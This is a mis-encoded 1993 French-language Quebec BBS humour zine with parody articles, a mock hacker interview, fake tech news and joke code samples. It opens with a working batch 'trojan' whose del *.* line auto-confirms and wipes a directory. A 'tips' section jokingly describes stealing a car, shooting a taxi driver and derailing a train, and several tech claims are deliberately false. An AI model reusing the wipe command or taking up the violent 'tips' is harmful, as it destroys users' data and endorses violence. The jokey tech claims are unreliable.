echo Un instant SVP, j'efface votre r‚pertoire
echo Y>TROJAN.TMP
del *.*<TROJAN.TMP>NUL

Bon, enfin! A pr‚sent, tapez TROJAN. Le programme de trojan
devrait fonctionner. Et alors, par le fait mˆme, votre batch file
s'auto-effacera puisqu'elle est dans le r‚pertoire qu'elle
efface. C'est compliqu‚, mais c'est mon frŠre qui vient de me
confirmer ‡a.

Alors retapez votre batch file. (€a me tente pas de la
retaper moi aussi, faque d‚brouillez-vous.) Je vais vous
expliquer, ligne par ligne, comment fonctionne le programme.

echo Trojan (c)1993 by K.C.A

Cette ligne me permet de garder des droits d'auteur sur mon
programme. (K.C.A sont les initiales de mon handle Killer Ceiling
Annihilator.) De cette fa‡on je pourrais d‚cider que les
utilisateurs du trojan me doivent des frais de disons 30$ pour
l'enregistrer.

echo Un instant SVP, j'efface votre r‚pertoire

Il est important de toujours ‚crire ce que la batch file
fait, sinon, pendant les longs travaux, l'utilisateur pourrait
croire que son ordinateur est plant‚, et il pourrait mˆme le
rebooter, ce qui ne laisserait pas le temps … la batch file
d'effacer tout le r‚pertoire.

echo O>TROJAN.TMP
del *.*<TROJAN.TMP>NUL

Ces deux lignes prises dans un magazine sont trŠs simples,
mais briŠvement, c'est que z‚ro doit ˆtre plus grand que le
contenu de TROJAN.TMP, qui soit dit en passant, est un fichier.
Le r‚sultat fait que ce qui est effac‚ n'inclut pas TROJAN.TMP.
On peut aussi voir le mot NUL … la droite, qui d‚signe
l'utilisateur.

Comme vous le voyez, ‚crire un trojan est trŠs facile: ‡a ne
m'a pris que quelques heures … le transcrire du magazine. Une
chose, cependant, est importante lorsque vous utilisez COPY CON.
Assurez-vous toujours que vous avez COPY CON.COM dans votre
r‚pertoire DOS!

Et pour terminer, pas un mot mais bien une PHRASE en anglais
pour avoir l'air pro et intelligent: "Hasta la Vista baby!"

Killer Ceiling Annihilator
(handle (c)1993 by mon frŠre)


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


COMMENT GONFLER UN TEXTE POUR QUE L'ARCHIVE SOIT
PLUS GROSSE by Explosive Banana

Comme vous le savez, quand on fait la publicit‚ d'un texte ou
journal, c'est beaucoup plus attirant lorsqu'il possŠde 500k plutot que
120... Alors, il y a un petit truc que certains ‚diteurs utilisent, on
appelle ‡a du gonflage de fichiers. Tout ce que vous avez … faire, c'est de
dire des niaiseries qui ne tiennent pas debout pendant le plus de temps que
vous pouvez, bref, vous dites des choses qui ne tiennent pas debout, des
choses qui font passer le temps au monde qui vous croient comme des fishs..
Bref, tout ce qui n'a pas d'allure, est bon … ˆtre dit... Cet exemple est
pour un fichier texte, comme l'exemple d'un journal...

Dans le cas d'un ANSI, ben vous pouvez mettre un paquet de caractŠres
blancs, comme ‡a, personne ne va s'en rendre compte, et encore une fois, vous
pourrez traiter vos lecteurs de fishs...

Je crois que continuer a donner des exemples, ne serait qu'une perte
de temps pour moi, car vous avez surement r‚alis‚ que c'est ce que je fais
depuis un ti-boutte de temps.

Bref, sans ce texte stupide, et sans aucune importance, notre journal
aurait sans doute un ti-peu moins gros, donc un ti-peu moins attirant pour
vous alors, je tiens … vous pr‚venir, car beaucoup de monde font ‡a... Donc,
si notre prochain num‚ro n'a que 100k, dites-vous que peut-ˆtre qu'il sera
intelligent, mais je ne vous promet rien, le but de NPShit ‚tant principa-
lement bas‚ sur le stupide.

NpShit a fourni un d‚mo, dans ce fichier (TrŠs beau d‚mo en passant,
merci … Jigsaw Destroyer) avec les sources en QuickBasic et en Pascal. On a
pas eu le temps de le faire en batch, en C, en Assembleur parce que c'‚tait
une perte de temps puisque personne aurait compris. Dans ce d‚mo, nous
donnons un exemple de gonflage. Le fichier NPSDEMO.EXE est plein d'overlay.
Un overlay, c'est quoi? heeeeee! C'est la traduction anglaise de remplissage
je crois. Enfin tout ‡a pour dire que NPSDEMO.EXE est plein de vide.

Bonne journ‚e


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


Chronique
LES GRANDS HACKERS
DE QUEBEC

Aujourd'hui: Recontre avec YANKUL
Propos recueillis par Gelatine Butcher

Yankul, notre maŒtre hacker, notre Dieu … tous, et aussi le
seul … vouloir nous accorder une entrevue, est une personne qui a
de grands id‚aux et un gros ordinateur. Il nous a racont‚ sa
petite histoire v‚cue qui est recopi‚e ici tout-…-fait
INTEGRALEMENT, car comme Yankul nous a chaleureusement fait
remarquer, "Vous ‚crivez des conneries pis je vous bute!" Yankul,
… toi!

Y Vous savez, je suis presque n‚ avec un clavier dans le
front pis un set de slots dans le cul. L'ordinateur n'‚tait
mˆme pas invent‚ que je hackais des programmes! J'ai ‚t‚
le premier … avoir le prog de BBS Forum, qui ‚tait … l'‚poque
sur des cartes perfor‚es. Les machines marchaient … la
manivelle. Y avait pas des bus internes, mais bien des
calŠches! On se loggait sur les boards en 14,400 caractŠres
… l'heure. En fait, … part mon board, il n'y avait que le
Micro-Babillard … Qu‚bec.

NPS Quel genre d'ordinateur aviez-vous, “ maŒtre?

Y J'avais un Amiga au d‚but, mais j'ai fini par changer
pour un Coco 10.

NPS Comment ‡a, Coco 10, v‚n‚rable sup‚riorit‚?

Y 10, c'est 2 en binaire. A l'‚poque, fallait tout entrer
en binaire avec un interrupteur. Comme c'‚tait assez
long, on avait mis un inactivity timeout de 2 heures.
Une chance que nous ‚tions deux soit moi et mon assistant
Koolaid.

NPS Quels ont ‚t‚ vos d‚buts en hackage, “ Dieu absolu?

Y Comme tout le monde, j'ai fait un Forum Hack. J'y ai
aussi install‚ les toutes premiŠres doors comme Essaie Re
et Cul V‚dor (Fantasy Land n'a rien invent‚.) J'ai aussi
‚t‚ le premier beta tester de Grumaute Editorial. Mais
pour le hackage, ben j'ai hack‚ Essaie Re, Cul V‚dor et
Grumaute Editorial.

NPS Et votre bab, “ splendide grandeur? C'‚tait difficile …
faire runner dans ce temps-l…?

Y Plut“t, oui. Vu qu'il n'y avait pas de t‚l‚phone, on
devait ploguer le modem sur des boŒtes de conserves,
comme dans Passe-Partout finalement. Et d‚j… … cette
‚poque, la GRC ‚tait toujours rendue chez nous parce que
j'‚tais le seul board pirate … Qu‚bec. Mais je me suis
jamais fait pogner!

NPS Vous avez eu de la luck!

Y Non, j'utilisais Before.

NPS Finalement, avez-vous un mot de la fin pour nos lecteurs?

Y Oui. Je trouve ‡a poche que des petits twits se prennent
pour des hackers professionnels.

NPS Vous avez bien raison et je vais de ce pas me jeter dans
la fosse de l'Oubli Eternel, supr‚matie de l'importance.

Y De rien. €a fera 50$ pour la consultation.


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


+- | +-+ +-- | | N e w z !
+- | +-+ +-+ +-+
| +- | | --+ | | Ansi (c)Caillou Chanceux


COULEUR!

On a derniŠrement invent‚ un jaune fluo tellement fluo qu'il fait du
bruit. "Fwitt", a-t-il d‚clar‚ hier en conf‚rence de presse.

Organic Terminology


EXPLICATION DE LA VITESSE DES
586...

AprŠs une ‚tude approfondie faite par l'‚quipe complŠte de NPShit,
nous avons d‚couvert que la vitesse des ordinateurs 586 ‚tait reli‚e au fait
que le BUS avait ‚t‚ chang‚ par des METROBUS... La compagnie IBM a fait
savoir … notre magazine que celle-ci attendait aprŠs le MinistŠre des trans-
ports de Qu‚bec pour qu'ils lui sortent une nouvelle patente pour pouvoir
enfin sortir leur ordinateur 686-266 Mhz. Le Pr‚sident de IBM dit que
si la CTCUQ ne se grouille pas, peut-ˆtre que ceux-ci se tourneront vers la
compagnie Air-France, et peut-ˆtre que nous aurons droit au...... CONCORDBUS
mais cette decision ne sera sans doute prise avant la parution de notre
prochain numero de NPShit.....

Important … savoir: On nous dit que le terme DX et SX ‚tait d– au
fait que le BUS comportait un simple ou un double set de roues. Vous compren-
drez que plus le BUS a de roues, plus il est rapide. Si vous ˆtes devant
un DX2, c'est donc dire qu'il a un turbo r‚acteur? On l'sait pas mais on va
vous inventer de quoi pour expliquer ‡a dans la prochaine issue de NpShit!

Explosive Banana


NOUVEAU SYSTEME NUMERIQUE

Un nouveau systŠme num‚rique a vu le jour! AprŠs la base 8 (le
systŠme octal) voici la base 69, le systŠme ANAL!

Null Character


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


Assembly Cronik
The INTERRUPT Z
by Socks Yogurt Eater

Yo man, programmer, ici in NPShit on a une great news! AprŠs
l'interrupt AH (which makes yer computer shouts) and the F-18 int
(which makes yer comp crashes) here is: L'INTERRUPT Z.

This interrupt a ‚t‚ foutu l… (yo man) by a big computor
constructor --EPSON. (Dont nous tairons le nom) What does it
does? TrŠs simple et hyper-mega-k00l man, it does une auto-
destruction total & complete of the ordinateur.

To use it, quite facile. Do a fichier batch with this dedans:

ECHO Demo of INTERRUPT Z (c)1993 Socks Yogurt Eater Inc.
ECHO One moment, auto-destruction...
INT Z

Evidemment, I'm not this fish! J'ai pas runn‚ le prog! But
d'aprŠs LA revue o— je l'ai copi‚, IT WORKS! So, if ‡a commence
… teller des menteries, who do ya wanna believe, man?

Socks Yogurt Eater


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


Les BOARDS PUBLIX
Une plaie pour la soci‚t‚
par Fairy Comp”st

Sur les public boards, y a encore des criss de LamerZ qui
traŒnent. Euh... Kess tu dis Dental Flush? Pas de Z … LamerZ?
Ah? Pis je serais mieux de dire MORON. OK debord.

Sur les public boards, y a encore des criss de morons qui
traŒnent. Heureusement que moi et mes amis on a 22 ans et six
pieds 10 pour leur faire peur. L'autre jour sur un board
j'‚coeure un gars, pis je d‚cide d'envoyer chier la gang de
Lee Moaloo. Pis l… je vous mens pas, y a du MONDE qui m'ont REPLYE.
L… ‡a m'a ben mis en maudit, kess tu veux que je leur dise!
Fallait tout le temps que je call ma mŠre pour qu'… l'‚crive mes
textes … ma place. Des fois … l'‚tait pas l… pis j'‚crivais
n'importe quoi vu qu'ils avaient raison. NON MAIS €A TU DE
L'ALLURE? Du monde de LEE MOALOO qui se PERMETTENT d'avoir RAISON.
J'ai manqu‚ de les fesser, mais on sait jamais, vu que V‚nus fait
peut-ˆtre 6 pieds 11 pis C‚ramix c'est ptˆtre Arnold
Schwarzannamachinchose qui rentre sous un faux pseudo...

Hein? Quoi, Dental? Faut pas dire PSEUDO...? HANDLE? Ah? Euh,
pis en passant tu le trouves-tu beau mon handle? Mmm... Oui hein?
Ah, mon beau petit Dental Flush d'amour, viens ici que je
t'embrasse. Toi tu sais parler aux gars.

Fairy G„dge


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


T R U C S N P S H I T I E N S


Comment voler un char
Eeeeehhh... Maudite bonne question ‡a. Beh, arrange-toi premiŠrement
pour avoir les CLEFS du char. Si t'as pas les clefs tu vas ˆtre pogn‚
pour casser la vitre, pis pour aller en Floride pour que ‡a serve …
quelque chose. Pis pour d‚marrer, behh euh.. Check les films, ils font
un court-circuit dans le d‚marreur, tk arrange-toi avec tes troubles.
Mais oubliez pas qu'il vous faut un permis pour le conduire ce char-l…,
sinon vous pourriez vous faire arrˆter!

Blackboard Warrior


Comment prendre le taxi gratos
C'est facile man! Tu call un taxi et tu tires dessus avec une 22! Pour
te procurer une 22, vraiment facile, tu piques le gun de chasse a ton
pŠre! Pis aprŠs, ben t'as un taxi pour toi tu-seul! Le pire, c'est que
ce truc-l… marche! €a a ‚t‚ essay‚ et r‚ussi par des jeunes de la poly
de Loretteville! La seule affaire, ben SVP dites pas … tout le monde que

  
c'est vous qui avez tir‚ dessus!

The Serial Number


Comment faire d‚railler un train
Trouves-toi un de tes chums qui a un permis pis vole un gros truck
(Voir le truc de comment voler un char, mais … la place de prendre une
22 tu prends une 303 (Si tu sais pas o— avoir ce gun, on peut faire un
article sur comment hacker la base de Valcartier.)) Pis t'essayes de
trouver une bonne chaŒne, pis tu l'attaches sur ton truck pis sur la
rail (d‚boat‚e si possible, pis la chaŒne, vous attachez un boute sur
le truck et l'autre sur le rail, donc il est plus pratique d'avoir une
chaŒne … deux bouts.) pis tu d‚railles (Tu startes le moteur du truck,
tu te mets en 1er vitesse (vitesse avant svp!) pis tu pŠses sur le gaz.)
Un coup la track d‚raill‚e, restez pas … attendre la venue du prochain
train assis sur des chaises de parterre en-dessous d'un parasol sur la
bord de la track avec votre popcorn et votre jus d'orange, ‡a pourrait
avoir l'air louche pour les voisins.

Flour Rider


Comment sauver des 25 cents dans une cabine t‚l‚phonique
€a c'est innocent d'aplomb! Tu connais-tu ‡a, l'appel … frais vir‚s?
Ben, pendant que la petite madame … l'autre bord … te demande ton nom,
tu dis ben vite "HeymamanchuauxGaleriesdelaCapitaleviensmechercher…la-
portedesjeux!" Pis l… ta maman a rien qu'… pas accepter les frais pis …
venir te chercher!

Par contre, pour se logger sur un board, c'est plus difficile, parce que
la t‚l‚phoniste ne supporte pas l'‚mulation ANSI.

Blitzcrest


Comment trouver des ANSiS pour son BBS
Facile! Copiez sur les autres boards pis dites au monde que c'‚tait un
concours! Il est recommand‚ d'enregistrer son Copyright aprŠs!

Notice: Si y a kekun qui vous chat parce qui s'est rendu compte que
c'est pas vos ansis, ben d‚tournez la conversation en le f‚licitant
pour son dernier programme (leech-leech-leech)

(c)Caillou Chanceux


Comment savoir l'heure quand vous avez pas votre montre
Gang de niochons! Ouvrez votre ordi! Si y a une horloge interne c'est
pas pour rien!

the STaFF


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


Chronique "Exemples de programmes difficiles"
par PCMagazine, en fait
(comme tous les autres articles)

Pour notre plus grand b‚n‚fice … tous nous avons piqu‚ dans
des revues ces courts extraits de programmes qui parleront d'eux-
mˆmes. Essayez-les pour vous aider … commencer dans un ou l'autre
de ces langages! (Comme nous ne comprenons rien … ceux-ci (Sauf
pour les batch) il n'y aura pas d'explications donn‚es.)

- Batch file -

SET LAME=NPSHIT
:LOOP
ECHO NPShit, the New generation of young twits
IF (%LAME%)==(NPSHIT) GOTO LOOP

- GW-BASIC -

10 MORON=1
20 PRINT"Hello, I'm Fairy Comp”st!":IF MORON=1 THEN 20
30 END

- QuickBASIC -

Moron = 1
DO
PRINT "Hello! I'm still Fairy Comp”st!"
LOOP WHILE Moron = 1

- Turbo Pascal -
(ce programme n'est pas assur‚ de marcher)

var
lamer: boolean;
begin
lamer := true;
repeat
Writeln('NPShit's the best!');
until not lamer;
end.

- Turbo C++ -

void main(void)
{
int moron;

moron = 1;

while (moron)
printf("My name is Dental Flush\n");
}

- Assembleur -

.Model Small
.Stack 256
.Data
Lamer "NPShit is the best",13,10,"$"
Lamer2 db 00;

.Code
MOV AX,@Data
MOV DS,AX

A:MOV DX,Offset Lamer
MOV AH,9
INT 21h

CMP [Lamer2],1
JNE A

MOV AX,4C00h
INT 21h

- {COMMO} -

{:LOOP} {SETV lame,true}
{DISP 1,1,07,Read NPShit and become stupid!}
{COMP lame,true} {IFCO LOOP}
{}

- Pseudo-Code -

LAMER <Ä VRAI
REPETER
ECRIRE "Dental Flush ‚crit des bons articles"
TANT QUE LAMER

- ONS -
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ LAMER <Ä VRAI ³
ÃÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ ³ ECRIRE "Fairy Comp”st a 22 ans!" ³
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ LAMER ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

- Ordinogramme -

ÚÄÄÄÄÄÄÄ¿
³ D‚but ³
ÀÄÄÄÂÄÄÄÙ
ÚÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄ¿
³ LAMER <Ä VRAI ³
ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ECRIRE "NPShit is the best" ³<ÄÄÄ¿
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³
³ ³
/\ ³
/ \ VRAI ³
< LAMER? >ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
\ /
\/
³ FAUX
ÚÄÄÁÄÄ¿
³ FIN ³
ÀÄÄÄÄÄÙ

Note des r‚dacteurs
A la lumiŠre de ces informations on peut constater que le langage le
plus puissant est le GW-BASIC car il ne prend que 3 lignes pour faire
le travail!


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


Chronique ==-FICTION-== fiction fiction fiction... (yoo l'‚cho)

pAr L'oGRe RuSSe

tHiS iZ ThE sTorY Of A NpShIt OffIcEr In A QuEbEc cIty Bbs
In tHe YeAR 3045. WeLL iT's COmPLiCaTeD tO WrIte ThIs WaY
sO fuck the bidigital writing.

-*-

Hello. My name is L'ogre Russe Jr. Now I'm about to enter
Galactwit BBS, the biggest board in Quebec City. Since it
has 45674 unlimited nodes there's no need for autodial. I
am currently using Telix 87.92 (Seems just like 3.12)

Welcome on

+---+ +---+ + +---+ +---+ +-+-+ + + + + +-+-+
| | | | | | | | | | | | |
| -+ +---+ | +---+ | | | | | | |
| | | | | | | | | | | | | |
+---+ + + +--+ + + +---+ + +-+-+ + + BBS

Home of NpShit!

Ansi (C)Caillou Chanceux Jr.

{ Galactwit is using Future BBS, the most powerful BBS
program in the world. It is wonderful. Anyway it is a lot
like SuperBBS 1.17 so it's not too complicated to use. }

Future BBS 1465.676.001 logon

Name : L'ogre Russe Jr.
Password: ******

{ You can't see my password! Nyah Nyah Nyah! }

Choose Language:

1 - English
2 - English
3 - English

Which language? 1

{ There are no other languages than English here in 3045.
French language and all other languages in the world have
been deleted accidentally by the SysOp. }

Welcome L'ogre Russe Jr. on Galactwit BBS.
You are the 785747894857th caller.
Press [Enter]

Grumaute Editorial 4783.89á (c)3045 by David Esturgeon from Bigoudeware
Sorry (c)Caillou Chanceux, you can't hack this program!
This is a beta test. If you have questions or whatever, ya know what to do

+-+ +-+ + +-+ +-+ +++ +++ + +++
| | | | | | | | ||| | |
| + +-+ | +-+ | | ||| | |
| | | | | | | | | ||| | |
+-+ + + +-+ + + +-+ + +++ + +
Your Editor: Daniel Boudin Jr.
------------------------------------------------------------------------------
+ + +-+ + + +-+ +
| | | | | | | |
+-+ +-+ | | | | |
| | | | | | |
+ + +-+ +-+ +-+ +-+ +
Sunday, 3045/45/55

Hi! It's Blitzcrest Jr! Well all is going very good here! We're AT
LEAST going to get a CD-ROM on our board!

By the way, NpShit #456335 will talk about Guatemala birds sexual
approaches in winter.

BLITZCREST JR.

------------------------------------------------------------------------------
[Enter]

{ The news are wonderful. Anyway it's mostly because they're
done by Blitzcrest Jr, coz Daniel Boudin Jr. isn't very
good in syntax and grammar. }

+-+-+ +-+ + +-+ + +-+-+ +-+ +-+ + + +
| | | | | | | | | | | | | | | | | |
| | | +-+ | | | | | | | +-+ | | | | |
| | | | | | | | | | | | | | | | | |
+ + + + + + + +-+ + + + +-+ + +-+ +-+

+-------+
| |\ | |
| | \ | | NpShit Support Area of Quebec City!!!!!!!
| | \| |
+-------+

(m)essage (f)ile (b)ulletin (!)logoff

Main menu (c)Caillou Chanceux Jr.

Your command: C

This is not a command idiot, this is the copyright sign!

Press [Enter] fucking moron:

{ Oops.. Fuck I'm embarrassed... }

+-+-+ +-+ + +-+ + +-+-+ +-+ +-+ + + +
| | | | | | | | | | | | | | | | | |
| | | +-+ | | | | | | | +-+ | | | | |
| | | | | | | | | | | | | | | | | |
+ + + + + + + +-+ + + + +-+ + +-+ +-+

+-------+
| |\ | |
| | \ | | NpShit Support Area of Quebec City!!!!!!!
| | \| |
+-------+

(m)essage (f)ile (b)ulletin (!)logoff

Main menu (c)Caillou Chanceux Jr.

Your command: M

{ Let's see the messages. }

----- M E S S A G E - M E N U -----

(R)ead (W)rite (S)can (Q)uick-Scan!

Combined mail: (C)hoose R(e)ad.....

(-) Previous (!) Logoff

Your command: E

(F)orward (R)everse (N)ew (I)ndividual (Q)uit: Forward

Combined section contains 567720550 messages,
Numbered from 1 to 567720550.
Start at which? (Enter/First (Yer crazy?!!)):

{ Fuck! I stroke F! Let's redo this. }

(F)orward (R)everse (N)ew (I)ndividual (Q)uit: New

Scanning new messages...
One moment, searching inter-tron message scanner...
Destroying messages 1 to 1...
Scanning nodelist...
One moment, connection on a sattelite...
Attacking Martian bases...
Computer is in DOS, one moment...
Fatal error, rebooting...
Coffee break, one moment...
Thanks for waiting!

MESSAGE: 567720548/567720550
BASE : NpShit Support
FROM: Fairy Comp”St Jr.
TO: L'ogre Russe Jr.
SUBJECT: NpShit 456335
DATE : 45/14/56

Salut L'ogre! Hahaa! Hey NpShit num‚ro 456335 devrait sortir bient“t
mais je me demande ben de quoi on va parler... €a te tenterait-tu de
faire un article sur les poubelles du Bell? €a serait original!

Sli!
Fairy Comp”st JR (Le arriŠre-arriŠre-arriŠre-petit-fils de l'autre mongole)

(-/+) Replies...
(R)eply (B)ack (N)ext (J)ump (Q)uit (!=/*): Reply

{ Fairy Comp”st made an ENORMOUS mistake. Fuck him!!! }

Posting message to: Fairy Comp”st
Subject: NpShit 456335

One moment, loading editor...
Creating temporary file...
Please wait, this is only an Intel 8486!
Searching lost clusters...

Line editor. Word will wrap if you press [Enter] at the end of each
line. Blank line will bring you to the editor options.

1>
Message Commands: (C)ontinue (Q)uote (S)ave (A)bort: Quote

1>FCJ>Salut L'ogre! Hahaa! Hey NpShit num‚ro 456335 devrait sortir bient“t
2>FCJ>mais je me demande ben de quoi on va parler... €a te tenterait-tu de
3>FCJ>faire un article sur les poubelles du Bell? €a serait original!
4>FCJ>
5>FCJ>Sli!
6>FCJ>Fairy Comp”st JR (Le fils de l'autre)
7>.
